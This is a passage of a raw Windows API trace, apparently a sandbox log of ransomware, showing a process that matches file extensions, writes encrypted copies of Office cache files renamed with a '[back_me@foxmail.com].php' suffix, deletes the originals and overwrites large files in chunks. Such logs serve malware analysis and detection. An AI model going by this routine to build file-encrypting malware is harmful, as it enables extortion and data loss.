Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.839] lstrlenW (lpString=".dbf") returned 4 [0046.839] lstrcmpiW (lpString1=".dbf", lpString2=".cab") returned 1 [0046.839] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.839] lstrlenW (lpString=".1cd") returned 4 [0046.839] lstrcmpiW (lpString1=".1cd", lpString2=".cab") returned -1 [0046.840] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-00B4-0409-1000-0000000FF1CE}-C\\ProjLR.cab") returned 73 [0046.840] lstrlenW (lpString=".jpg") returned 4 [0046.840] lstrcmpiW (lpString1=".jpg", lpString2=".cab") returned 1 [0046.840] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0046.840] lstrlenW (lpString="msvcr90.dll") returned 11 [0046.840] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.401] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=655872) returned 1 [0047.401] CloseHandle (hObject=0x20c) returned 1 [0047.401] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 0x2020 [0047.401] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.401] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.401] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.401] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.402] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.402] GetLastError () returned 0x0 [0047.402] ReadFile (in: hFile=0x20c, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0xa0200, lpOverlapped=0x0) returned 1 [0047.415] WriteFile (in: hFile=0x1f4, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xa0210, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xa0210, lpOverlapped=0x0) returned 1 [0047.426] ReadFile (in: hFile=0x20c, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.426] WriteFile (in: hFile=0x1f4, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xea, lpOverlapped=0x0) returned 1 [0047.426] SetEndOfFile (hFile=0x1f4) returned 1 [0047.427] CloseHandle (hObject=0x1f4) returned 1 [0047.427] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.427] SetEndOfFile (hFile=0x20c) returned 1 [0047.432] CloseHandle (hObject=0x20c) returned 1 [0047.432] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.433] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\msvcr90.dll")) returned 1 [0047.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.433] lstrlenW (lpString=".doc") returned 4 [0047.433] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.433] lstrlenW (lpString=".docx") returned 5 [0047.433] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.433] lstrlenW (lpString=".pdf") returned 4 [0047.433] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.433] lstrlenW (lpString=".xls") returned 4 [0047.433] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.433] lstrlenW (lpString=".xlsx") returned 5 [0047.433] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.433] lstrlenW (lpString=".ppt") returned 4 [0047.433] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.433] lstrlenW (lpString=".zip") returned 4 [0047.433] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.433] lstrlenW (lpString=".rar") returned 4 [0047.433] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.433] lstrlenW (lpString=".bz2") returned 4 [0047.433] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.433] lstrlenW (lpString=".7z") returned 3 [0047.433] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.433] lstrlenW (lpString=".dbf") returned 4 [0047.433] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.433] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.433] lstrlenW (lpString=".1cd") returned 4 [0047.434] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.434] lstrlenW (lpString=".jpg") returned 4 [0047.434] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.434] lstrlenW (lpString=".doc") returned 4 [0047.434] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString=".docx") returned 5 [0047.434] lstrcmpiW (lpString1=".docx", lpString2="0.dll") returned -1 [0047.434] lstrlenW (lpString=".pdf") returned 4 [0047.434] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString=".xls") returned 4 [0047.434] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString=".xlsx") returned 5 [0047.434] lstrcmpiW (lpString1=".xlsx", lpString2="0.dll") returned -1 [0047.434] lstrlenW (lpString=".ppt") returned 4 [0047.434] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.434] lstrlenW (lpString=".zip") returned 4 [0047.434] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString=".rar") returned 4 [0047.434] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.434] lstrlenW (lpString=".bz2") returned 4 [0047.434] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.434] lstrlenW (lpString=".7z") returned 3 [0047.434] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.434] lstrlenW (lpString=".dbf") returned 4 [0047.434] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.434] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.434] lstrlenW (lpString=".1cd") returned 4 [0047.435] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.435] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\msvcr90.dll") returned 74 [0047.435] lstrlenW (lpString=".jpg") returned 4 [0047.435] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.435] lstrcmpiW (lpString1=".dll", lpString2=".php") returned -1 [0047.435] lstrlenW (lpString="osetupui.dll") returned 12 [0047.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.435] GetFileSizeEx (in: hFile=0x20c, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=191872) returned 1 [0047.435] CloseHandle (hObject=0x20c) returned 1 [0047.435] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 0x2020 [0047.435] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.435] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x20c [0047.435] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.436] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.436] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1f4 [0047.436] GetLastError () returned 0x0 [0047.436] ReadFile (in: hFile=0x20c, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x2ed80, lpOverlapped=0x0) returned 1 [0047.578] WriteFile (in: hFile=0x1f4, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0x2ed90, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0x2ed90, lpOverlapped=0x0) returned 1 [0047.584] ReadFile (in: hFile=0x20c, lpBuffer=0x40c0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x38bfed4, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesRead=0x38bfed4*=0x0, lpOverlapped=0x0) returned 1 [0047.586] WriteFile (in: hFile=0x1f4, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x38bfc9c, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfc9c*=0xec, lpOverlapped=0x0) returned 1 [0047.586] SetEndOfFile (hFile=0x1f4) returned 1 [0047.586] CloseHandle (hObject=0x1f4) returned 1 [0047.586] SetFilePointerEx (in: hFile=0x20c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.586] SetEndOfFile (hFile=0x20c) returned 1 [0047.588] CloseHandle (hObject=0x20c) returned 1 [0047.588] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0047.588] DeleteFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\osetupui.dll")) returned 1 [0047.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.589] lstrlenW (lpString=".doc") returned 4 [0047.589] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.589] lstrlenW (lpString=".docx") returned 5 [0047.589] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0047.589] lstrlenW (lpString=".pdf") returned 4 [0047.589] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.589] lstrlenW (lpString=".xls") returned 4 [0047.589] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.589] lstrlenW (lpString=".xlsx") returned 5 [0047.589] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0047.589] lstrlenW (lpString=".ppt") returned 4 [0047.589] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.589] lstrlenW (lpString=".zip") returned 4 [0047.589] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.589] lstrlenW (lpString=".rar") returned 4 [0047.589] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.589] lstrlenW (lpString=".bz2") returned 4 [0047.589] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.589] lstrlenW (lpString=".7z") returned 3 [0047.589] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.589] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.589] lstrlenW (lpString=".dbf") returned 4 [0047.590] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.590] lstrlenW (lpString=".1cd") returned 4 [0047.590] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.590] lstrlenW (lpString=".jpg") returned 4 [0047.590] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.590] lstrlenW (lpString=".doc") returned 4 [0047.590] lstrcmpiW (lpString1=".doc", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString=".docx") returned 5 [0047.590] lstrcmpiW (lpString1=".docx", lpString2="i.dll") returned -1 [0047.590] lstrlenW (lpString=".pdf") returned 4 [0047.590] lstrcmpiW (lpString1=".pdf", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString=".xls") returned 4 [0047.590] lstrcmpiW (lpString1=".xls", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString=".xlsx") returned 5 [0047.590] lstrcmpiW (lpString1=".xlsx", lpString2="i.dll") returned -1 [0047.590] lstrlenW (lpString=".ppt") returned 4 [0047.590] lstrcmpiW (lpString1=".ppt", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.590] lstrlenW (lpString=".zip") returned 4 [0047.590] lstrcmpiW (lpString1=".zip", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString=".rar") returned 4 [0047.590] lstrcmpiW (lpString1=".rar", lpString2=".dll") returned 1 [0047.590] lstrlenW (lpString=".bz2") returned 4 [0047.590] lstrcmpiW (lpString1=".bz2", lpString2=".dll") returned -1 [0047.590] lstrlenW (lpString=".7z") returned 3 [0047.591] lstrcmpiW (lpString1=".7z", lpString2="dll") returned -1 [0047.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.591] lstrlenW (lpString=".dbf") returned 4 [0047.591] lstrcmpiW (lpString1=".dbf", lpString2=".dll") returned -1 [0047.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.591] lstrlenW (lpString=".1cd") returned 4 [0047.591] lstrcmpiW (lpString1=".1cd", lpString2=".dll") returned -1 [0047.591] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned 75 [0047.591] lstrlenW (lpString=".jpg") returned 4 [0047.591] lstrcmpiW (lpString1=".jpg", lpString2=".dll") returned 1 [0047.591] lstrcmpiW (lpString1=".msi", lpString2=".php") returned -1 [0047.591] lstrlenW (lpString="AccessMUI.msi") returned 13 [0047.591] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.722] GetFileSizeEx (in: hFile=0x198, lpFileSize=0x38bff1c | out: lpFileSize=0x38bff1c*=2517504) returned 1 [0047.723] CloseHandle (hObject=0x198) returned 1 [0047.723] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi")) returned 0x2020 [0047.723] GetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0047.723] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[back_me@foxmail.com].php")) returned 1 [0047.723] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.msi.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x198 [0047.723] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0x0) returned 1 [0047.723] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.723] ReadFile (in: hFile=0x198, lpBuffer=0x40c0058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x40c0058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.741] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.741] ReadFile (in: hFile=0x198, lpBuffer=0x4100058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4100058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.752] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xfffc0000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x38bfc6c | out: lpNewFilePointer=0xffffffff) returned 1 [0047.752] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc2c | out: lpNewFilePointer=0x0) returned 1 [0047.752] ReadFile (in: hFile=0x198, lpBuffer=0x4140058, nNumberOfBytesToRead=0x40000, lpNumberOfBytesRead=0x38bfc38, lpOverlapped=0x0 | out: lpBuffer=0x4140058*, lpNumberOfBytesRead=0x38bfc38*=0x40000, lpOverlapped=0x0) returned 1 [0047.952] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfec8 | out: lpNewFilePointer=0x0) returned 1 [0047.952] WriteFile (in: hFile=0x198, lpBuffer=0x40c0020*, nNumberOfBytesToWrite=0xc0106, lpNumberOfBytesWritten=0x38bfcb0, lpOverlapped=0x0 | out: lpBuffer=0x40c0020*, lpNumberOfBytesWritten=0x38bfcb0*=0xc0106, lpOverlapped=0x0) returned 1 [0048.219] SetEndOfFile (hFile=0x198) returned 1 [0048.219] RtlAllocateHeap (HeapHandle=0xb10000, Flags=0x0, Size=0x40000) returned 0x432d940 [0048.219] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.219] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.221] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0xcce00, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.221] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.226] SetFilePointerEx (in: hFile=0x198, liDistanceToMove=0x226a00, lpNewFilePointer=0x0, dwMoveMethod=0x38bfc7c | out: lpNewFilePointer=0x0) returned 1 [0048.226] WriteFile (in: hFile=0x198, lpBuffer=0x432d940*, nNumberOfBytesToWrite=0x40000, lpNumberOfBytesWritten=0x38bfc88, lpOverlapped=0x0 | out: lpBuffer=0x432d940*, lpNumberOfBytesWritten=0x38bfc88*=0x40000, lpOverlapped=0x0) returned 1 [0048.229] HeapFree (in: hHeap=0xb10000, dwFlags=0x0, lpMem=0x432d940 | out: hHeap=0xb10000) returned 1 [0048.229] CloseHandle (hObject=0x198) returned 1 [0048.230] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x2020) returned 1 [0048.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.230] lstrlenW (lpString=".doc") returned 4 [0048.230] lstrcmpiW (lpString1=".doc", lpString2=".msi") returned -1 [0048.230] lstrlenW (lpString=".docx") returned 5 [0048.230] lstrcmpiW (lpString1=".docx", lpString2="I.msi") returned -1 [0048.230] lstrlenW (lpString=".pdf") returned 4 [0048.230] lstrcmpiW (lpString1=".pdf", lpString2=".msi") returned 1 [0048.230] lstrlenW (lpString=".xls") returned 4 [0048.230] lstrcmpiW (lpString1=".xls", lpString2=".msi") returned 1 [0048.230] lstrlenW (lpString=".xlsx") returned 5 [0048.230] lstrcmpiW (lpString1=".xlsx", lpString2="I.msi") returned -1 [0048.230] lstrlenW (lpString=".ppt") returned 4 [0048.230] lstrcmpiW (lpString1=".ppt", lpString2=".msi") returned 1 [0048.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned 89 [0048.230] lstrlenW (lpString=".zip") returned 4 [0048.230] lstrcmpiW (lpString1=".zip", lpString2=".msi") returned 1 [0048.230] lstrlenW (lpString=".rar") returned 4 [0048.230] lstrcmpiW (lpString1=".rar", lpString2=".msi") returned 1 [0048.230] lstrlenW (lpString=".bz2") returned 4 [0048.230] lstrcmpiW (lpString1=".bz2", lpString2=".msi") returned -1 [0048.230] lstrlenW (lpString=".7z") returned 3 [0048.230] lstrcmpiW (lpString1=".7z", lpString2="msi") returned -1 [0048.230] lstrlenW (lpString="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") 